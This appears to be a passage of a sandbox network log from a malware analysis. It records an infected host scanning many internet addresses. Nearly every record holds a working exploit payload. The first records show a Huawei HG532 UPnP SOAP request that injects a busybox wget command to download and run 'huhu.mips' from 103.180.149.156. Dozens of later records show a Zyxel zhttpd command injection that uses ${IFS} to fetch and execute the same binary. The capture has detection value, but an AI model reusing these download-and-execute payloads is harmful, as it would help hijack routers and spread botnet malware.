                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7955192.168.2.1453036197.148.89.6237215
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.880691051 CET829OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7956192.168.2.143768423.12.59.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954174995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7957192.168.2.145325696.151.78.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954230070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7958192.168.2.143470094.132.16.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954257965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7959192.168.2.143445234.13.237.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954307079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7960192.168.2.145966423.219.90.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954354048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7961192.168.2.1435108164.205.149.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954402924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7962192.168.2.143341865.98.79.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954448938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7963192.168.2.1449842220.74.221.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954488993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7964192.168.2.1455348140.29.63.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954525948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7965192.168.2.144339687.225.9.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954559088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7966192.168.2.1453254210.17.143.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954586983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7967192.168.2.144874446.85.207.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954649925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7968192.168.2.1456692146.188.20.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954674959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7969192.168.2.1443382170.50.0.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954730988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7970192.168.2.1447532177.142.35.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954771042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7971192.168.2.1457972145.13.170.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954799891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7972192.168.2.1438680213.191.116.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954835892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7973192.168.2.144417291.81.71.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954889059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7974192.168.2.1445010158.94.196.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954924107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7975192.168.2.1442060178.160.73.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954962015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7976192.168.2.1455108106.185.207.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.954993963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7977192.168.2.144525437.210.156.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955054998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7978192.168.2.1436950124.228.57.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955115080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7979192.168.2.145141688.174.228.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955137014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7980192.168.2.143692238.83.224.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955208063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7981192.168.2.1443732187.108.53.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955238104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7982192.168.2.1458798100.197.83.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955261946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7983192.168.2.1439300129.231.246.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955322027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7984192.168.2.1440636168.99.36.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955369949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7985192.168.2.143421013.220.210.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955400944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7986192.168.2.144498412.190.122.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955430984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7987192.168.2.143493440.161.91.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955457926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7988192.168.2.146067827.152.83.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955495119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7989192.168.2.1445648117.245.196.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955530882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7990192.168.2.143849434.202.140.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955576897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7991192.168.2.1435522108.237.171.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955634117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7992192.168.2.1441132185.75.28.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955667973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7993192.168.2.1448776172.117.161.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955713987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7994192.168.2.144340649.229.217.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955753088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7995192.168.2.144846824.232.138.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955780029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7996192.168.2.1443306169.125.70.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955832005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7997192.168.2.1448338186.108.187.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955869913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7998192.168.2.143576051.200.52.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955905914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7999192.168.2.1442726204.98.5.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.955959082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8000192.168.2.145475263.20.146.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956006050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8001192.168.2.1443452173.44.218.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956038952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8002192.168.2.1457120125.112.84.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956073046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8003192.168.2.1451452149.147.106.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956125021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8004192.168.2.1437412177.81.196.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956166983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8005192.168.2.143333245.172.93.149443
                                                      TimestampBytes transferredDirectionData
